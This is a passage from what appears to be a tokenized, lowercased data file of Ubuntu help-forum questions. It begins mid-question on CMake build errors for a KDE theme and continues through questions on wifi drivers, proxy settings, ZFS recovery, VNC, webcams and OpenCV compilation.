/usr/share/kde4/apps/cmake/modules/findkde4workspace.cmake:70 ( find_package_handle_standard_args ) cmakelists.txt:7 ( find_package ) -- configuring incomplete , errors occurred ! see also `` /home/sawyer/oxygen-transparent/build/cmakefiles/cmakeoutput.log '' . see also `` /home/sawyer/oxygen-transparent/build/cmakefiles/cmakeerror.log '' . system cmake -dcmake_install_prefix=`kde4-config -- prefix` -dcmake_build_type=release /home/sawyer/oxygen-transparent/src > & 1 failed : 256 sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent $ cd build sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent/build $ sudo make install [ sudo ] password for sawyer : make : *** no rule to make target `install ' . stop . sawyer @ sawyer-aspire-7560 : ~/oxygen-transparent/build $ the output found in the error log file is this : determining if the q_ws_win exist failed with the following output : change dir : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec242714903/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec242714903.dir/build.make cmakefiles/cmtrycompileexec242714903.dir/build make [ 1 ] : entering directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec242714903.dir/checksymbolexists.c.o /usr/bin/cc -i/usr/include/qt4 -o cmakefiles/cmtrycompileexec242714903.dir/checksymbolexists.c.o -c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : in function ‘main’ : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : error : ‘q_ws_win’ undeclared ( first use in this function ) return ( ( int* ) ( & q_ws_win ) ) [ argc ] ; ^ /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : note : each undeclared identifier is reported only once for each function it appears in make [ 1 ] : *** [ cmakefiles/cmtrycompileexec242714903.dir/checksymbolexists.c.o ] error 1 make [ 1 ] : leaving directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' make : *** [ cmtrycompileexec242714903/fast ] error 2 file /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : /* */ # include < qtcore/qglobal.h > int main ( int argc , char** argv ) { ( void ) argv ; # ifndef q_ws_win return ( ( int* ) ( & q_ws_win ) ) [ argc ] ; # else ( void ) argc ; return 0 ; # endif } determining if the q_ws_qws exist failed with the following output : change dir : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec283792793/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec283792793.dir/build.make cmakefiles/cmtrycompileexec283792793.dir/build make [ 1 ] : entering directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec283792793.dir/checksymbolexists.c.o /usr/bin/cc -i/usr/include/qt4 -o cmakefiles/cmtrycompileexec283792793.dir/checksymbolexists.c.o -c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : in function ‘main’ : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : error : ‘q_ws_qws’ undeclared ( first use in this function ) return ( ( int* ) ( & q_ws_qws ) ) [ argc ] ; ^ /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : note : each undeclared identifier is reported only once for each function it appears in make [ 1 ] : leaving directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' make [ 1 ] : *** [ cmakefiles/cmtrycompileexec283792793.dir/checksymbolexists.c.o ] error 1 make : *** [ cmtrycompileexec283792793/fast ] error 2 file /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : /* */ # include < qtcore/qglobal.h > int main ( int argc , char** argv ) { ( void ) argv ; # ifndef q_ws_qws return ( ( int* ) ( & q_ws_qws ) ) [ argc ] ; # else ( void ) argc ; return 0 ; # endif } determining if the q_ws_mac exist failed with the following output : change dir : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec3368427543/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec3368427543.dir/build.make cmakefiles/cmtrycompileexec3368427543.dir/build make [ 1 ] : entering directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec3368427543.dir/checksymbolexists.c.o /usr/bin/cc -i/usr/include/qt4 -o cmakefiles/cmtrycompileexec3368427543.dir/checksymbolexists.c.o -c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : in function ‘main’ : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : error : ‘q_ws_mac’ undeclared ( first use in this function ) return ( ( int* ) ( & q_ws_mac ) ) [ argc ] ; ^ /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c:8:19 : note : each undeclared identifier is reported only once for each function it appears in make [ 1 ] : leaving directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' make [ 1 ] : *** [ cmakefiles/cmtrycompileexec3368427543.dir/checksymbolexists.c.o ] error 1 make : *** [ cmtrycompileexec3368427543/fast ] error 2 file /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : /* */ # include < qtcore/qglobal.h > int main ( int argc , char** argv ) { ( void ) argv ; # ifndef q_ws_mac return ( ( int* ) ( & q_ws_mac ) ) [ argc ] ; # else ( void ) argc ; return 0 ; # endif } determining if the pthread_create exist failed with the following output : change dir : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec1033947317/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec1033947317.dir/build.make cmakefiles/cmtrycompileexec1033947317.dir/build make [ 1 ] : entering directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec1033947317.dir/checksymbolexists.c.o /usr/bin/cc -o cmakefiles/cmtrycompileexec1033947317.dir/checksymbolexists.c.o -c /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c linking c executable cmtrycompileexec1033947317 /usr/bin/cmake -e cmake_link_script cmakefiles/cmtrycompileexec1033947317.dir/link.txt -- verbose=1 /usr/bin/cc cmakefiles/cmtrycompileexec1033947317.dir/checksymbolexists.c.o -o cmtrycompileexec1033947317 -rdynamic cmakefiles/cmtrycompileexec1033947317.dir/checksymbolexists.c.o : in function `main ' : checksymbolexists.c : ( .text+0x16 ) : undefined reference to `pthread_create' collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ cmtrycompileexec1033947317 ] error 1 make [ 1 ] : leaving directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' make : *** [ cmtrycompileexec1033947317/fast ] error 2 file /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/checksymbolexists.c : /* */ # include < pthread.h > int main ( int argc , char** argv ) { ( void ) argv ; # ifndef pthread_create return ( ( int* ) ( & pthread_create ) ) [ argc ] ; # else ( void ) argc ; return 0 ; # endif } determining if the function pthread_create exists in the pthreads failed with the following output : change dir : /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp run build command : /usr/bin/make `` cmtrycompileexec368632354/fast '' /usr/bin/make -f cmakefiles/cmtrycompileexec368632354.dir/build.make cmakefiles/cmtrycompileexec368632354.dir/build make [ 1 ] : entering directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' /usr/bin/cmake -e cmake_progress_report /home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp/cmakefiles 1 building c object cmakefiles/cmtrycompileexec368632354.dir/checkfunctionexists.c.o /usr/bin/cc -dcheck_function_exists=pthread_create -o cmakefiles/cmtrycompileexec368632354.dir/checkfunctionexists.c.o -c /usr/share/cmake-2.8/modules/checkfunctionexists.c linking c executable cmtrycompileexec368632354 /usr/bin/cmake -e cmake_link_script cmakefiles/cmtrycompileexec368632354.dir/link.txt -- verbose=1 /usr/bin/cc -dcheck_function_exists=pthread_create cmakefiles/cmtrycompileexec368632354.dir/checkfunctionexists.c.o -o cmtrycompileexec368632354 -rdynamic -lpthreads /usr/bin/ld : can not find -lpthreads collect2 : error : ld returned 1 exit status make [ 1 ] : leaving directory `/home/sawyer/oxygen-transparent/build/cmakefiles/cmaketmp' make [ 1 ] : *** [ cmtrycompileexec368632354 ] error 1 make : *** [ cmtrycompileexec368632354/fast ] error 2 i really want oxygen on my system , but i have absolutely no idea where to start on this . what went wrong and how do i fix it ?
497401	dell inspiron 1545 can not connect to wifi	i 've installed ubuntu 12.04 on a dell inspiron 1545 and i can not access the internet . on the menu , wired says the cable is unplugged and wireless can not find any network available . the laptop comes with a dell wireless 1397 wlan minicard . i did try to connect using an ethernet cable . when i went to system settings - > networks there was no list of connections and at the top it said `` the cable is unplugged '' . i found similar questions about problems with wireless connection and one of the answers was to connect with a cable and download a driver , that 's why i tried wired connection first . i also found recommendations to use sudo apt-get install -- reinstall bcmwl-kernel-source or sudo apt-get purge bcmwl-kernel-source as a first step of fixing the problem . when i typed any of these commands i got as response that the package was not found . after running lspci | grep network the output is : 0c:00.0 network controller : broadcom corporation bcm4312 802.11/g lp-phy ( rev 01 ) below i paste the commands i ran and the output cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' linux user 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 16:19:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci -nnk | grep -ia2 net 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : b43-pci-bridge iwconfig lo no wireless extensions . lsmod module size used by nls_iso8859_1 12713 1 bnep 18258 2 rfcomm 47864 0 bluetooth 247024 10 bnep , rfcomm joydev 17613 0 parport_pc 28284 0 ppdev 17113 0 snd_hda_codec_idt 71153 1 uvcvideo 82214 0 videobuf2_core 40785 1 uvcvideo b43 392109 0 videodev 130053 2 uvcvideo , videobuf2_core videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc mac80211 630977 1 b43 cfg80211 525244 2 b43 , mac80211 snd_hda_intel 44339 3 snd_hda_codec 141716 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 102477 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30417 1 snd_seq_midi coretemp 13596 0 i915 620421 3 snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61930 2 snd_seq_midi , snd_seq_midi_event mac_hid 13253 0 gpio_ich 13526 0 snd_timer 29989 2 snd_pcm , snd_seq dell_wmi 12681 0 drm_kms_helper 49597 1 i915 sparse_keymap 13890 1 dell_wmi snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 97873 0 dell_laptop 17425 0 drm 287564 4 i915 , drm_kms_helper microcode 23017 0 dcdbas 14449 1 dell_laptop serio_raw 13215 0 lpc_ich 17144 0 i2c_algo_bit 13564 1 i915 snd 69533 15 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device bcma 41244 1 b43 video 19652 1 i915 soundcore 12680 1 snd snd_page_alloc 18798 2 snd_hda_intel , snd_pcm wmi 19256 1 dell_wmi lp 17799 0 parport 46562 3 parport_pc , ppdev , lp ums_realtek 18256 0 usb_storage 61749 2 ums_realtek ahci 25879 2 libahci 31606 1 ahci ssb 57842 1 b43
497402	how to remove proxy set in the office when working at home ?	i have proxy set in in my office laptop for work at office . i am trying to connect to wireless at home but it is not letting me do this . i tried steps in the link below without any succes . http : //www.ubuntugeek.com/how-to-configure-ubuntu-desktop-to-use-your-proxy-server.html i am able to change the firefox setting and it is working perfect . when doing apt-get through terminal it tries to go through proxy . i see that the echo $ http_proxy still have the proxy address . i tried following : cat /etc/apt/apt.conf this file does not contain anything . gedit /etc/bash.bashrc has no mention of proxy . i set the network proxy none , but nothing happened . wrote acquire : :http : : proxy `` false '' ; in /etc/apt/apt.conf , i get this acquire : :http : : proxy `` false '' ; what is wrong with my settings ? thanks
497404	wierd poblem with shaders on minecraft without report	when ever i run minecraft shaders it brings me back to the launcher ( after going into a world/server ) without a crash report ! i have to uninstall the mod to play minecraft even though i am using the correct version . this worked for my friend ( who uses windows 8 ) . how can i fix this ?
497408	scanning windows for rootkits using linux	i know of clamav for viruses , but is there an option for scanning and getting rid of `` rootkits '' from windows from inside linux i.e . live boot usb ? also spyware and malware scanning would be nice too . considering on getting into working on and fixing computers ( residential ) as a side deal . but want to do things as linux based as possible . in order to do that business , will need to get back into the `` windows '' swing of things . but hopefully will be good chance to swing people to the freedom side of things . which is why i want as much linux tools as possible . thank you and god bless
497415	how can i install ubuntu 14.04 ?	i got asus s400ca with ubuntu 12.04 64bits , already i downloaded ubuntu 14.04 64bits , but i do n't know how reboot to install the new version from my usb .
497418	show desktop keys not returning to windows	i was configuring some stuff at compiz using the visual manager . however , before making the changes , the show desktop key in ubuntu 14.04 was working properly : it hide all opened windows then unhide them when pressed again . now it will just hide then , but wont unhide the windows . how do i make it to unhide the windows after pressed again ? thanks
497420	if i replace windows with ubuntu , will i still have to back up my stuff ?	i 've heard from people that to get both windows and ubuntu you have to make a backup . now , since i do n't want to have to pay money for an external hard drive ( and spend a few quadrillion years getting stuff on there ) , can you replace windows without having to use a backup ?
497421	navigate vim help with ctrl- ]	i am using ubuntu 14.04 with default settings for shell . when i use gnome-terminal to open vim help , it does not work when i hit ctrl- ] when being on a tag ( note that this works with tty1 ) . vim help quote : jump to a subject : position the cursor on a tag ( e.g . |bars| ) and hit ctrl- ] .
497422	repeated `` oops 0000 [ # 1 ] smp '' crashes	my installation of ubuntu 12.04 is repeatedly crashing to black screens . it crashes during a variety of activities ( watching youtube videos in chrome , rendering video , watching other video , playing flash games , etc . ) i have seen the information on the ubuntu wiki for debugging this type of crash but am unsure how to collect the requested data , since a ) the crashes happen with a variety of modules and b ) i can not easily save the output information . i was only able to capture the output of dmesg once . the rest of the information i have gathered is in this set of crudely capture screenshots . the problem also occurs in a clean installation of lubuntu 12.04 , so i fear a hardware problem but am unsure how to proceed .
497423	usinig maildrop with ubuntu	due to a total burn up , literally , of my mandriva machine yesterday i 've decided to upgrade to a newer and better distro . i 've installed ubuntu 14.04 lts and am slowly getting things back in shape again . i 'm using imap with my local folders under evolution . prior to the crash i was using fetchmail and procmail . for some reason procmail wo n't install which is too bad as it was working great for me . i 've moved onto maildrop , have it installed but i 'm having problems finding examples of the /etc/maildroprc file . i 've reinstalled fetchmail and courier-imap and both seem to be running fine . would anyone have any examples of what a maildroprc file should look like ? all the sites i 've looked at on-line just do n't seem to help or else i just do n't understand them . thanks chris
497424	environment variable - how does properly set them ( bashrc or profile )	i am very new in ubuntu and i am lost about environment variable . i have read some forums but i did n't understand yet . if i type java -version i got the java confirmation but if i type echo $ java_home there is nothing or echo $ path there is nothing related to java . in some forum i read to create /etc/profile.d/java.sh file and add the export commands . other one tells to edit /etc/environment , other tells to add export commands in /etc/profile and even other one tells to edit bash.bashrc . currently , there is the java in my ubuntu in /usr/lib/jvm/java-8-oracle/jre and i am able to run some java tools ( eg . eclipse ) but i am trying to add maven and i am very confused how do the environment variables work in ubuntu . i came from windows and basically i would like to set these variables as simple as possible .
497429	recent update to 12.04lts messed up desktop .	after a recent update on a vmware virtual machine , the desktop duplicating the images on the left hand side of the desktop on the right hand side . the right hand images do not respond to the mouse but the left hand ones do , so this is a display image duplication .
497430	server side filtering - courier , postfix , roundcube	i have a mail server running postfix , courier , and roundcube . i 'm looking to add the ability for a user to assign their own custom mail filters from the web . i have n't yet found a way i can do this , from what i can tell roundcube 's filter plugin works just like it would on a mail client - that meaning , it has to check the mail before it can filter them . any help would be appreciated .
497433	i need fast recording software for gaming specifically for minecraft	i 've tried recordmydesktop but it makes my computer lag . kazam is kind of slow after encoding and there are n't enough options . and istanbul is for beginners . vokoscreen i 've used the most it works pretty well but i need an upgrade . vlc media player is n't a screen recorder and creates lag . tibesti has the slowest fps for me . simplescreenrecorder is over rated for gaming . recorditnow it 's recordmydesktop and ffmpeg ( i 've never tried ffmpeg ) . xvidcap i used for a while but not anymore very basic though . glc i never could use that software shift + f8 did n't record . please help . : )
497442	ubuntu reboots into windows after i click install in the installer	the system reboots after i click install on the on the part of the installation that says `` install ubuntu alongside windows '' , `` replace windows with ubuntu '' , etc . i have a theory that it is not recognizing the unassigned disk partition i have made for linux and it rebooting to go to the ubuntu 's disk partitioner and my battery warning on my laptop is messing up the reboot into the ubuntu disk partitioner . i 've successfully installed ubuntu linux on two other computers , so i know it should n't shut down in this phase of the installation , but i do n't know what happens when when you have not made the disk partition in windows first so ... edit : system info : hp pavilion g6 laptop w/ windows 7 . have around a 600 gb hdd , 100 gbs unallocated , 471 gbs main drive , the rest are recovery and hp tools . partitions table in windows :
497443	some pdf books are not opening in ubuntu 14.04	there is a book that i am trying to open in my ubuntu 14.04 but some pages are getting displayed and some are just blank but when i open that book in android phone then it opens normally ... i installed android fonts in ubuntu but nothing happened .
497444	ubuntu 14.04 network bonding mii status	below is my /proc/net/bonding/bond0 file in ubuntu my ifconfig shows that the p2p1 is up but the mii status is down how can i get it up please help bonding mode : loading balancing ( round-robin ) mii status : up mii polling interval ( ms ) :100 up delay ( ms ) : 0 down delay ( ms ) : 0 slave interface : em1 mii status : up speed : 100mps duplex : full link failure counter :0 permanent hw addr : a0 : b3 ; cc : e9:51:27 slave queue id : 0 slave interface : p2p1 mii status : down speed : 10 mbps duplex : half link failure count :0 permanent hw addr : 64:66 : b3:02 : bd:6f slave queue id : 0
497446	errors installing gnome on 14.04x64	i 'm trying to install gnome with the following commands : sudo apt-add-repository ppa : gnome3-team/gnome3-next sudo apt-add-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get install gnome-shell ubuntu-gnome-desktop but i 'm getting : the following packages have unmet dependencies : gnome-shell : depends : gnome-settings-daemon ( > = 3.4.0 ) but it is not going to be installed recommends : gnome-control-center but it is not going to be installed ubuntu-gnome-desktop : depends : gdm but it is not going to be installed depends : gnome-control-center but it is not going to be installed depends : gnome-session but it is not going to be installed depends : gnome-settings-daemon but it is not going to be installed depends : gnome-shell-extensions but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried sudo apt-get -f install , but no dice . what am i doing wrong here ? can i install the packages on my machine as the situation stands ?
497450	how do u install flashplayer	so , i got a computer from the salvation army and it has a password for the administrater and i need to install a flash player so what can i do to get around this ? every time i try to watch a video i get a message that i need to download a flash player but i have to authenticate with a password from previous owner ! help ! !
497453	how mount ntfs - external hard drive at startup with execute permission	i want to change steam library to my ntfs - external hard drive but it shows new steam library folder must be on a filesystem mounted with execute permission so how mount my ntfs - external hard drive at startup with execute permission ?
497454	ubuntu installer not picking up windows partition	i 'm trying to install ubuntu 14.04 . in the installer the `` install alongside '' option is not there so i clicked `` something else '' . i have been all over google and youtube . when other people click `` something else '' there is a bar at the top showing free space and i 'm assuming it is the windows partition but it is n't on mine . its just one long grey bar saying i have 500 gbs free . please help me as i do n't know what to do . i have also allocated free space for ubuntu so i 'm assuming it should show free space and the space that windows is on , right ?
497456	how to resolve disk space problem in ubuntu while using apt-get -f install ?	when i use the command apt-get -f install , i received the following error dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-65-generic-pae_3.2.0-65.99_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during './boot/vmlinuz-3.2.0-65-generic-pae ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-65-generic-pae /boot/vmlinuz-3.2.0-65-generic-pae run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-65-generic-pae /boot/vmlinuz-3.2.0-65-generic-pae errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-65-generic-pae_3.2.0-65.99_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ''
497459	how to prevent ssh login in ubuntu 12.04 for users without home directory ?	i have ldap auth configuration and i want to prevent user to have access to a computer without home directory on it . console login and kdm login work fine - user access is denied , but sshd permits to login with home directory / . how to avoid this problem ?
497462	zfs pool - in dire need of help .	i 'm really really new to ubuntu . which is probably why i 'm facing this predicament ... i could n't load ubuntu this evening . for whatever reason i could get to the login screen , but absolutely no further on my account or the guest account . the screen simply would n't load . i have four drives . one ssd , three hdds in a zfs raid . basically a raid 5 . a & b drives = ab on c drive . my lack of understanding of ubuntu made me figure i could just re-install the os which was on the ssd . so , i overwrote the entire installation . i believe i 've reinstalled zfs correctly on ubuntu . i then attempted to recreate the pool using what i could remember from the settings . probably not the right thing to do now that i 've done it ... i 'm cursing myself right now . running sudo zpool import gives me /namedrive $ sudo zpool import pool : namepool id : 5108504088423678092 state : unavail status : one or more devices contains corrupted data . action : the pool can not be imported due to damaged devices or data . see : http : //zfsonlinux.org/msg/zfs-8000-5e config : quantumpool unavail insufficient replicas raidz1-0 unavail insufficient replicas sda unavail sdc unavail sdd unavail i probably screwed up by trying to remount the drive in the same location . i seriously am freaking out that i 've lost all of my data . any help is appreciated . it should be abundantly clear i do n't know what i 'm doing and i 'm still learning . if my data is gone and ca n't be recovered , just let me know .
497466	how can i allow wifi for specific user	i have setup an ubuntu server with multiple user for remote access . the public internet access is thru wifi . i need to block the public internet access for all user except two users , root and admin now i could had used the following command sudo iptables -a output -m owner -- uid-owner user_you_want_to_block -j rejec this will block all the outgoing traffic for the user which i can not do , i need allow all the user to use intranet which is thru the eth0 how should i do this nisheeth
497470	ubuntu resume fails , after full boot `` apportcheckresume '' has encountered an error	recently resuming from hibernation fails on my laptop running ubuntu 14.04 . i see the splash screen for so long that i decide to force shutdown the computer . after normal boot , i get this error message , which i am not able to post due to lack of reputation [ http : //i.stack.imgur.com/qznzm.png ] . behaviour that i expected : laptop resuming from suspend normally .
497471	no sound ubuntu minimal	i have no sound in ubuntu 13.10 . xfce window manager after re-installing ubuntu minimal twice , i still have the same problem : sound works fine at first but after i reboot to windows and back to ubuntu it refuses to work . windows was shut down completely . i tried to re-install alsa-base , alsa-utils , linux-sound-base and pulseaudio several times . also tried to reload them then reboot the pc . nothing happend . pavucontrol sound bar moves when i 've music playing , that means my sound card is working properly ... apparently . this is my aplay -l output : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc887-vd digital [ alc887-vd digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 3 [ hdmi 3 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
497473	problem with mbo that does not support hdmi sound	processor is intel g2010 , but motherboard does not support sound through hdmi . ubuntu 12.04 64bit . problem arises when hdmi tv is connected ; sound is still output through analog channel ( and can be heard on audio ports ) , but tv thinks that sound is coming from hdmi and cuts its analog input ( he is using tv 's speakers with analog input ) . no such problem is in windows 7 . my guess is that hdmi signal is incorrect as it contains a flag or something that indicates that sound is also being transferred , but it is not . computer is owned by my relative and he does n't have any info on which mbo it is ... if it is very important he can remove case cover and search for name ... hours and hours of googling did not help , this is the last resort before buying dedicated graphics card . edit : output of aplay -l command : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 output of lspci | grep vga : 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 )
497475	how to remove flagged identical lines in text files	i want to remove selected identical lines jumbled in text file b . the identical lines are flagged with % mark in begining of line in file a . how to achive this through commandline . eg : file a contents aaa - 789 bbb - 456 % ccc - 980 file b contents aaa - 789 ccc - 980 bbb - 456 want to remove ccc - 980 in file b .
497476	is there a way to open synaptic package manager with specific custom filter selected ?	i have created a custom filter for specific set of tools . i want to start spm ( synaptic package manager ) with the above mentioned filter so that synaptic open with list of tools i wants to show . i see that editing /root/.synaptic/synaptic.conf file makes changes in spm interface . on setting viewmode `` 3 '' ; spm starts with custom filter option selected . like the same i could not find any parameter for selecting specific filter from all shown . there is one more file /root/.synaptic/filters with all filters definition . is there any parameter to be set in this file so as to achieve my requirement ?
497477	sound is outputting through both the built-in speakers and external speakers	i 'm using xubuntu on a imac . when i have a output device attached ( whether that be headphones or speakers ) it plays through both the built-in audio , along with the device and i 'd like to prevent this from happening . i 'm not very experienced with linux , ubuntu , or xubuntu , so any feedback or additional information i can get would be helpful . edit ( information ) when running the command pavucontrol , and going to the `` output devices '' tab . the only connected device shown is `` built-in audio analog stereo '' ( even when selecting `` all devices '' )
497479	vncserver session for each user	i have installed vnc4server and i did configure the vncserver in /etc/init.d/vncserver for start and stop operations . this part works fine but for one user i have multiple users on the ubuntu server . the user uses vncviewer to access remotely to do this i have to login as an user and start the vncserver and it gives me a pid then i send this pid to the user which access the ubuntu server from vncviewer as a.b.c.d : x there is problem with this , if the ubuntu server gets rebooted then all the sessions are lost and i need to login as user again and start the vncserver for each users let me know the better way to use it
497483	integrated webcam stopped working ubuntu 14.04	i 've been on ubuntu 14 for maybe 2 months . when i first installed it i was on unity until i switched to gnome , and then i removed unity , lightdm , and gnome and now i use i3wm . my built in webcam worked perfectly fine when i had i3wm installed beside lightdm and unity , and i believe it even worked after i removed unity and lightdm for a while , but i 'm not sure what happened . i assume i removed something critical . i 'm using an inspiron n5110 . cheese outputs a black box saying `` no device found '' . same with skype . if i try to visit a site like omegle flash crashes . i also tried plugging in a usb webcam that worked previously on this same install and it did n't work , so i 'm doubting that it 's a hardware problem output of lsusb : ~ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0c45:6483 microdia bus 001 device 003 : id 8086:0189 intel corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub output of dmesg|grep uvcvideo ~ dmesg|grep uvcvideo [ 21.718907 ] uvcvideo : found uvc 1.00 device laptop_integrated_webcam_hd ( 0c45:6483 ) [ 21.985380 ] usbcore : registered new interface driver uvcvideo edit : after messing around with some things it seems like it 's a permissions problem . if i sudo guvcview or sudo cheese , my webcam will run properly . both will . but only if i sudo . any advice ?
497486	`` make '' error when installing opencv	[ 38 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/convert.o in file included from /home/bomi/opencv/modules/core/src/precomp.hpp:55:0 , from /home/bomi/opencv/modules/core/src/convert.cpp:43 : /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:354:13 : error : ‘ptrdiff_t’ does not name a type typedef ptrdiff_t difference_type ; ^ in file included from /home/bomi/opencv/modules/core/src/precomp.hpp:55:0 , from /home/bomi/opencv/modules/core/src/convert.cpp:43 : /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2600:13 : error : ‘ptrdiff_t’ does not name a type typedef ptrdiff_t difference_type ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2623:24 : error : declaration of ‘operator [ ] ’ as non-function uchar* operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2623:22 : error : expected ‘ ; ’ at end of member declaration uchar* operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2623:34 : error : expected ‘ ) ’ before ‘i’ uchar* operator [ ] ( ptrdiff_t i ) const ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2626:36 : error : declaration of ‘operator+=’ as non-function matconstiterator & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2626:32 : error : expected ‘ ; ’ at end of member declaration matconstiterator & operator += ( ptrdiff_t ofs ) ; ^ /home/bomi/opencv/modules/core/include/opencv2/core/core.hpp:2626:46 : error : expected ‘ ) ’ before ‘ofs’ matconstiterator & operator += 